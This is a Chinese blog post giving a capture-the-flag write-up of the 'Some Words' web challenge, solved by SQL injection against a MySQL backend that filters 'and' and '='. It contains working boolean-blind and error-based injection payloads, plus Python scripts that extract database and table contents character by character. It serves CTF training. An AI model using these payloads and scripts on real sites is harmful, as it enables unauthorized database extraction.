第三届上海市大学生网络安全大赛WebWP题目Some Words

于 2020-10-26 21:51:24 发布
阅读量761 收藏
点赞数
分类专栏: WP 文章标签: mysql 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011250160/article/details/109256785
版权

主页
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php
在这里插入图片描述我的消息
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=1
在这里插入图片描述试探sql注入
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=1‘
在这里插入图片描述
报错说明存在注入漏洞,根据报错信息,说明后台使用的是MySQL
判断可注入的语句
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=1 and 1
在这里插入图片描述
说明and 1是不能构成注入的,猜测可能and被过滤了
为了验证and是不是被过滤了,换成or构成一条语句
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or 1
在这里插入图片描述
因为0 or 1 的结果是1,所以显示的结果是和id=1是一样的,说明or可以使用,而and不能
进一步测试
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or 1=1
页面返回的是 stupid hacker233
和上一次的对比可以发现“=”也是不能用的
既然“=”不能用,那我们试试“>”和“<”
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or 1>0
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or 1<2
网页返回的仍旧是id=1的界面,说明“>”和“<”是可以使用的
接下来我们就可以爆破了
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select database()),1,1))<50),1,0)

我们一句一句看一下
select database() 查询当前数据库的名称
substr((select database()),1,1) 的文档是substr(string,start,count)
所以这句话的意思是从1开始取数据库名字取出一位,也就是取出数据库名字的第一位
ascii() 返回字符串第一位的ascii值
if(expr1,expr2,expr3),如果expr1的值为true,则返回expr2的值,如果expr1的值为false,则返回expr3的值
所以组合在一起我们可以根据ascii码,判断出数据库名称的第一位是什么

http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select database()),1,1))>119),1,0)返回的界面和id=0是一样的
http://20dea9f5b3da4db1bb7fe3472e9d6096d924f1e154ab4473.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select database()),1,1))>118),1,0)返回的界面和id=1是一样的
说明数据库名称的第一位的ascii码是119对照ascii表就是"w"

但是我们这样一个一个去试也太慢了吧!!!
所以写个脚本帮我们去爆破数据库的名字吧

import requests

for i in range(1,2):
    result = ''
    for j in range(33,123):
        url = 'http://9ba73b383d55406aa1d6d28e7cbff419b8b5cc30b6d14b82.changame.ichunqiu.com/index.php?'
        payload = 'id=0 or if((ascii(substr((select database()),{iii},1))>{jjj}),1,0)'
        s = payload.format(iii=str(i),jjj=str(j))
        url = url + s
        ret = requests.get(url)
        result = s + "\t" + str(i) + "\t" + str(j)
        if 'Hello' in ret.text:
            result += "\tsuccess"
        else:
            result += "\tfail"
        print(result)

在这里插入图片描述
原理就是这样,接下来改进一下脚本,结果我们只希望看到数据库的名字

import requests
database_name=''
for i in range(1,10):
    result = ''
    for j in range(33,123):
        url = 'http://9ba73b383d55406aa1d6d28e7cbff419b8b5cc30b6d14b82.changame.ichunqiu.com/index.php?'
        payload = 'id=0 or if((ascii(substr((select database()),{iii},1))>{jjj}),1,0)'
        s = payload.format(iii=str(i),jjj=str(j))
        url = url + s
        ret = requests.get(url)
        if 'Hello' not in ret.text:
            database_name += chr(j)
            break
print(database_name)

在这里插入图片描述
这里我们不知道数据库名字有多长,就定了9位,因为我们第二个循环是从33开始跑的,33对应的ascii就是“!”,所以数据库的名字就是words
接下来爆破表名:
http://dfce75d8d9164f3ebad89459a42f515141c9d0308acc49cb.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select table_name from information_schema.tables limit 1),1,1))>35),1,0)
测试第一个表名得出 CHARACJER_SETS
http://dfce75d8d9164f3ebad89459a42f515141c9d0308acc49cb.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select table_name from information_schema.tables limit 1,1),1,1))>35),1,0)
测试第一个表名得出 COLLATIONS
代码爆破表名:

import requests
for k in range(1,50):
    database_name = ''
    for i in range(1,10):
        result = ''
        for j in range(33,123):
            url = 'http://dfce75d8d9164f3ebad89459a42f515141c9d0308acc49cb.changame.ichunqiu.com/index.php?'
            payload = 'id=0 or if((ascii(substr((select table_name from information_schema.tables limit {kkk},1),{iii},1))>{jjj}),1,0)'
            s = payload.format(kkk=str(k),iii=str(i),jjj=str(j))
            url = url + s
            ret = requests.get(url)
            if 'Hello' not in ret.text:
                database_name += chr(j)
                break
    print(database_name)

慢慢爆破总会全爆出来的

在这里插入图片描述

另一种思路,报错注入
http://29a316c714184d549125250e64bf4d5a215fb56d9d3543bf.changame.ichunqiu.com/index.php?id=1 or ExtractValue(0,concat(0x27,(select table_name from information_schema.tables limit 81,1)))
代码:

import re
import requests
for i in range(1,100):

    url = 'http://961f6e3d1a9747de93aa4d0425134ec53340173ff4d64973.changame.ichunqiu.com/index.php?' \
      'id=1 or ExtractValue(0,concat(0x27,(select table_name from information_schema.tables limit %s,1)))'%i
    req = requests.get(url=url)
    print(i,end='  ')
    print(req.text[-29:-1])

一共发现82条报错信息
可以看到里面有个表 f14g
在这里插入图片描述接下来查字段

http://961f6e3d1a9747de93aa4d0425134ec53340173ff4d64973.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select count(*) from f14g),1,1))>48),1,0)
网页显示和id=1一样,即为正常

http://961f6e3d1a9747de93aa4d0425134ec53340173ff4d64973.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select count(*) from f14g),1,1))>49),1,0)
网页显示和id=0一样,ascii 49 的值是1,所以f14g里只有一条记录

最后爆破里面的内容
http://e3d418c9cffe49af9f98159d7ba523a283e029997fd94614.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select * from f14g limit 1),1,1))>101),1,0)
网页显示和id=1一样,即为正常

http://e3d418c9cffe49af9f98159d7ba523a283e029997fd94614.changame.ichunqiu.com/index.php?id=0 or if((ascii(substr((select * from f14g limit 1),1,1))>102),1,0)
网页显示和id=0一样,ascii 102 的值为f
代码爆破:

import requests
flag = ''
for i in range(1,50):
    for j in range(32, 126):
        url = 'http://fc57d5d7846649fbb0b9feef505a1223dd6dada8bf764b43.changame.ichunqiu.com/index.php?' \
              'id=0 or if((ascii(substr((select * from f14g),'+str(i)+',1))>'+str(j)+'),1,0)'
        ret = requests.get(url=url)
        if 'Hello' not in ret.text:
            flag += chr(j)
            break
print(flag)

结果:
在这里插入图片描述
另一种得到flag的方法(报错):
在这里插入图片描述
在这里插入图片描述
重点来了,我用两种方法得出的flag去提交竟然都是错误!!!
求大佬指教!
ichunqiu-Web-Some Words

VVeaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路
曹振国的博客
05-01 1157
SOME WORDS1.发现SQL注入2.尝试SQLMap3.经实验发现过滤了"="和"and"reverse()函数flag总结 1.发现SQL注入 ?id=1 有数据 ?id=2 有数据 ?id=2-1 有数据 2.尝试SQLMap 发现报错: 3.经实验发现过滤了"=“和"and” 发现页面会返回错误信息,尝试报错注入: 用到函数:updatexml updatexml(目标xml内容,xml文档路径,更新的内容) 查询库名 ?id=updatexml(1,concat(0x7e,
第三届上海市大学生网络安全大赛 流量分析 traffic WriteUp
mutou990的博客
08-27 1390
参考1:https://www.cnblogs.com/sn1per/p/11835479.html 参考2:https://blog.csdn.net/JaySRJ7/article/details/102215248 题目链接: https://pan.baidu.com/s/1Utfq8W-NS4AfI0xG-HqSbA 提取码: 9wqs 解题思路: 打开流量包后,按照协议进行分类,发现了存在以下几种协议类型: ARP / DNS / FTP / FTP-DATA / ICMP / ICMPv6
第三届上海市大学生网络安全大赛2017全国邀请赛some words题解
weixin_30827565的博客
11-05 462
发现有错误回显,于是想到updatexml报错注入 http://ae67e27b918d4e49ad5c1cd6e8c6d4459137e5d215634ec1.game.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select database()),0x7e),1) 看到数据库words,在报错注入中还有一种简单的方式...
web大赛
03-05
博文链接:https://wujiekangyun.iteye.com/blog/201735
第三届上海大学生网络安全赛(线上赛)-MS1战队-Writeup
01-20
ctf write up 第三届上海大学生网络安全赛(线上赛)-MS1战队
tne.rar_operation_taste5xf_系统/网络安全
09-23
Imitation QQ some of the interface operation
优课UOOC 深圳大学 大学英语3 - 第2章 A quiz on the phrase put on 答案
04-25
优课UOOC 深圳大学 大学英语3 - 第2章 A quiz on the phrase put on 答案 在英语学习中,短语put on具有多种不同的意思,这取决于其所 collocate 的词语或表达式。了解put on的多种含义对于提高英语语言能力非常...
Some words
05-26
Google_v8_src.7z 博文链接:https://lucane.iteye.com/blog/481117
xx港市20xx年第二学期期末调研测试初一英语 .doc
06-20
xx港市20xx年第二学期期末调研测试 初一英语 x 注意事项: 1.答题前,考生先将自己的学校、班级、姓名、考试号填写在答题卷密封线内相应的位置上; 2.选择题、填空题、解答题必须用黑色签字笔答题,答案填在答题...
汽车+AUTOSAR+SOME/IP
最新发布
02-01
此协议规范指定了 AUTOSAR 协议“Scalable service-Oriented MiddlewarE over IP (SOME/IP) ”的格式,消息序列和语义。
第三届上海大学生网络安全大赛 流量分析
Assassin
11-06 3568
比赛时候的一道misc题目,睡觉去了没做,现在看一看感觉还是有一些意思的,决定还是补一补题目,首先打开Wireshake查看文件流,发现很多走的都是TLSv1协议,这个是加密的,暂时没什么办法解决。然后一个个分析tcp流发现了存在FTP流 发现了一些可能有用的东西,然后我们分别在这里tcp流下得到内容其中flag.zip两个 tcp.stream eq 38 tcp.stream eq 44 其中
ctf大赛web端的介绍其二
qq_45721814的博客
11-17 275
一、爆破,包括包括md5、爆破随机数、验证码识别等 二、绕WAF,包括花式绕Mysql、绕文件读取关键词检测之类拦截 注入 盲注 注入绕过 提示 !,!=,=,+,-,^,% 三、花式玩弄几个PHP特性,包括弱类型,strpos和===,反序列化+destruct、\0截断、iconv截断、 四、PHP伪协议,zip://、phar://、php://filter/read等 ...
白帽子讲Web安全读书笔记
热门推荐
刘书的IT博客
02-08 1万+
第7页 "No Patch for stupid"即“最大的漏洞就是人”,所以安全问题是一直存在的,安全的本质是信任问题,数据来源不可信,这是安全的一个原则安全是一个持续的过程,不断的升级与改善互联网安全的核心问题,是数据安全的问题。安全的3要素:CIA机密性(Confidentiality):要求数据内容不能被泄露,常见实现技术为加密。完整性(Integrity):要求数据内容是完整的,没有被
第三届上海市大学生网络安全大赛 PWN200 WriteUp
s1054436218的博客
11-08 1776
这题利用了UAF漏洞,在pwnable.kr中有类似的题。简单介绍 一下什么事UAF,UAF就是use after free,就是在C++申请内存的机制中,如果上一次free掉的内存和新申请的内存大小相同,那么再次申请就会申请到刚才free掉的内存,于是例如本题中,结构体嵌套了函数,在再次申请到内存的时候,被覆盖掉原有的内存地址中,把shell的地址放到结构体调用的函数中,就会触发UAF漏洞,详情
2020第三届江西省高校网络安全技能大赛 线下赛 CTF&AWD Writeup
末初的CSDN博客
09-19 3711
文章目录CTFMiscBoring_exe!_ezAffineDaylightBlueWebAurora websiteweb2(忘了叫啥名)CryptoInterceptedtelegramAWDAWD1AWD2 CTF Misc Boring_exe !_ ..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!... ..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.
【CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网杯)Crypto题解
cccchhhh6819的博客
10-25 6844
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
i春秋_真的很简单_过程记录(坑吐了。。。)
等风来
09-19 9661
0x01 打开实验环境,根据提示打开实验工具dedeCMS (坑一) 等等,我的工具呢???在实验环境里提供的工具中有个dedecms5.7但是不好用啊 WTF??? 实在不行去网上搜了下攻略,发现要自己下载dedecms,一点提示都没有,,,好坑啊 如图,得到网站管理员账号密码 后面的明显是md5加密后的密码,不过数了数只有20位,百度后得知dedecms的特点就是这样 在线破...
第三届上海市大学生网络安全大赛crackme
xuedingyue的博客
11-29 607
PEID查壳 北斗3.7版本的壳,单步或者esp定律法脱壳 最好不要用od自带的插件脱壳,我用od自带的插件脱壳后在ida32位中无法加载。 ida载入,f5看出加密算法 数据所在位置 脚本 得出flag...
ciscn_final_3 writeup
SkYe's Blog
10-24 302
基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled C++程序。只有两个功能,新建、释放堆块。数量上限为:24,大小限制为:0x78 。用列表维护,释放操作基于下标定位指针。 新建完成后会输出堆 fd 内存地址。 漏洞 free 没指令指针,造成 UAF : unsigned __int64 my_free() { __
please give me python code, and give me some examples, no less than 1000 words
04-03
I'm sorry, as an AI language model, I cannot provide code examples that contain a certain number of words. However, I can provide you with an introduction to Python, some basic syntax, and some ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值